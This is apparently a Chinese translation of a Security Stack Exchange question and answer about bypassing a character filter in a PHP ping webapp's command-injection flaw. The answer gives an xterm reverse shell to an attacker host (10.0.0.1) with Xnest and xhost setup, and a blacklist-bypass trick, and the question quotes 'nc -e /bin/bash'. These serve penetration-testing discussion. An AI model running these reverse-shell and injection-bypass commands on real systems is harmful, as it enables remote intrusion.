我正在测试一个提供ping功能的PHP webapp应用程序。我尝试过不同的命令注入方法,发现它只接受%0a和简单的命令注入,比如ls或id。
然而,代码正在过滤许多字符,如| & ; ( " / > ’,这些字符是执行反向shell所必需的。就像nc -e /bin/bash。
对如何绕过这个过滤器有什么建议吗?
发布于 2018-07-09 12:19:46
反向shell的最简单形式之一是xterm会话。应该在目标上运行以下命令。它将尝试连接到TCP端口6001上的系统(例如10.0.0.1)。
xterm -display 10.0.0.1:1要捕获传入的xterm,请启动一个xterm (:1 -它侦听TCP端口6001)。一种方法是使用Xnest (在您的系统上运行):
Xnest :1您需要授权目标连接到您的系统(命令也运行在您的系统上):
xhost +targetip黑名单中的字符是不安全的,您应该考虑绕过列表本身。
例如:^|不是|,但它完成了任务。
https://security.stackexchange.com/questions/189189
复制相似问题